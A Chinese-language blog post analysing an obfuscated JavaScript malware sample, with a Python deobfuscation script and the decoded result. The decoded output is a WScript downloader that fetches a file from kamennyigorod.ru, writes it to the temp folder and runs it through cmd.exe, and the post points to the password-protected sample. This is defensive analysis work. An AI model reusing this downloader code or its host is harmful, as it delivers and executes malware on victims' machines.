本篇是对JS样本做的简单分析第二篇,样本是上次改成设桌面背景的样本(卡饭精睿包2016.12.16.24,可自行下载),原因是这次又需要分析js的,暂时还没拿到样本,就用之前的练手.
0x1 py脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module ahoo'
__author__ = 'ahoo'
import sys
import io
import os
import codecs
import re
import shutil
PutPath = '24.vir' #JsVirus文件(卡饭精睿包2016.12.16.24).
OutPath = '24_analysis.txt' #提取到的文件.
myJslog = []
AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码
def ReadLogFile(InPath,ReadTye = 'r'):
logall = []
#print(InPath)
if os.path.exists(InPath):
f = codecs.open(InPath,ReadTye,'utf-8')
#读入到list
for line in f:
if None == line:
pass
else:
logall.append(line)
f.close()
return logall
def WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典
#if os.path.exists(InPath):
# pass
#else:
#要用全局变量把这里变成只写一次吗
global AuthorSign
f = codecs.open(OutRePath,WriteTye,'utf-8')
if AuthorSign == True:
f.write('\n*****************************************************\r\n')
f.write('* ahoo JsVirusAnalysis ')
f.write('\n***************************************************\r\n\n')
AuthorSign = False
for i in findRe:
f.write(i + '\n')
f.close()
return True
def JSVirus_Parse():
argv = sys.argv
argc = len(sys.argv)
#0.输入输出参数时用
if argc > 3:
print('Too many argv') #需要换成debugger
return False
#1.读取文件到LineList
myJslog = ReadLogFile(PutPath)
#2.找到定义变量的line,记录为字典:var xnisd = "open";
# 找到真实意义的代码行为解析做准备.
varLineDict = {}
CodeLineList = []
writeList = []
# 进行区分是不是变量的.
for line in myJslog:
if 'var' in line and '= "' in line: #var xnisd = "open";
key = re.match('[var]{3}\s*([a-z0-9A-Z_]{1,})\s*=\s*(".{1,}"$)',line)
if(key != None):
#print(key.group(2)) #
varLineDict[key.group(1)] = key.group(2)
else:
CodeLineList.append(line)
#print(varLineDict)
#print(CodeLineList)
#3.Parse
for line in CodeLineList:
#3.1 替换数组结构: ['e', ebylx, 'u', 'f'][1] --->ebylx
for Line12_split in re.findall('(\[[^\[\]]+\]\[\d\])',line): #参考下面过程.
index = int(re.match('\[(.*)\]\[(.*)\]',Line12_split).group(2))
repstr = re.match('\[(.*)\]\[(.*)\]',Line12_split).group(1).split(',')[index]
replaceTemp = re.compile('(\[[^\[\]]+\]\[\d\])')
line = replaceTemp.sub(repstr,line,count=1)
#print(line)
#3.2 替换变量为对应的值: ebylx --->"va"
for varline in varLineDict:
if varline in line:
vartemp = re.compile(varline)
line = vartemp.sub(varLineDict[varline],line)
#print(line)
#3.3 替换" + "为空格.
plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"')
line = plus.sub('',line)
#print(line)
writeList.append(line)
#4 写入并打开文件
WriteResultFile(OutPath,writeList)
os.system('notepad.exe ' + OutPath)
print('The Virus has been analyzed,there is my advice! Thanks!')
return True
if __name__ == '__main__':
JSVirus_Parse()
'''
--测试过程
---line = [gosax, 'b'][0]
print(re.match('\[.*\]',line)) 匹配到 [gosax, 'b'][0] 贪婪
print(re.match('\[(.*)\]\[(.*)\]',line).group(0))
print(re.match('\[(.*)\]\[(.*)\]',line).group(1))
print(re.match('\[(.*)\]\[(.*)\]',line).group(2))
re.match('\[(.*)\]\[(.*)\]',line).group(1).split(',')[0]
---(完成上面单个匹配到的替换) line = [gosax, 'b'][0] or ['e', ebylx, 'u', 'f'][1]
index = int(re.match('\[(.*)\]\[(.*)\]',line).group(2))
replaceTemp = re.compile('\[(.*)\]\[(.*)\]')
repstr = re.match('\[(.*)\]\[(.*)\]',line).group(1).split(',')[index]
line = replaceTemp.sub(repstr,line)
---line = "[gosax, 'b'][0] + ['e', ebylx, 'u', 'f'][1]"
re.match('\[(.*)\]?\[(\d)\]',line).groups()
re.match('\[(.*)\]?',line).group()
re.match('(\[[^\]]+\]\[\d\])',line).group()
---line = "[[gosax, 'b'][0] + ['e', ebylx, 'u', 'f'][1]]"
---line12 = "fxejoplod6 = woqvybd3[[yxypehn, 'gh', 'pk', 'o'][0] + ['rg', 'q', cjupryhfi][2]]([bnifpynmu, 'mj', 'e'][0], [ovfowqi, 'm', 'w'][0] , ['k', lwiju][1]);"
for Line12_split in re.findall('(\[[^\[\]]+\]\[\d\])',line12):
index = int(re.match('\[(.*)\]\[(.*)\]',Line12_split).group(2))
repstr = re.match('\[(.*)\]\[(.*)\]',Line12_split).group(1).split(',')[index]
replaceTemp = re.compile('(\[[^\[\]]+\]\[\d\])')
line12 = replaceTemp.sub(repstr,line12,count=1)
print(line12)
'''
0x2 输出结果
*****************************************************
*Name: ahoo JsVirusAnalysis
*****************************************************
var ybdetof5 = new ActiveXObject('Scripting.FileSystemObject');
if (['dm', 'o', new Function( "var inkezs3 = new Enumerator(ybdetof5.GetFolder('C:\\').SubFolders); if(inkezs3.item(0).name.length > 1) return true; else return false;")()][2]) {
hneneqil0 = this[ "WScript"];
istudyd7 = hneneqil0[ "CreateObject"]( "Scripting.FileSystemObject");
lysfopdep3 = hneneqil0[ "CreateObject"]( "WScript.Shel);
woqvybd3 = hneneqil0[ "CreateObject"]( "MSXML2.XMLHTTP");
jucyzmum2 = hneneqil0[ "CreateObject"]( "ADODB.Stream");
ihyxu0 = istudyd7[ "GetSpecialFolder"]( "2");
ubujile0 = istudyd7[ "GetTempName"]();
fxejoplod6 = woqvybd3["open"]("GET", "http://kamennyigorod.ru/form.uio", "0");
fxejoplod6 = woqvybd3[ "send"]();
jucyzmum2[ "type"] = "1";
avolcuc7 = woqvybd3["ResponseBody"];
hnoqasann0 = hneneqil0[ "ScriptFullName"];
fxejoplod6 = jucyzmum2[ "Open"]();
fxejoplod6 = jucyzmum2["Write"](avolcuc7);
fxejoplod6 = jucyzmum2[ "SaveToFile"](ihyxu0 + ubujile0);
fxejoplod6 = jucyzmum2["Close"]();
fxejoplod6 = lysfopdep3[ "run"]( "cmd.exe /c + ihyxu0 + ubujile0, "0");
}10
0x3 Sample
Sample- 注:请确认样本只用于测试才下载,其他的我可不负责…
密码国际惯例
0x4 参考文章
[1]pythonDocument : 6.2. re — Regular expression operations
[4]blog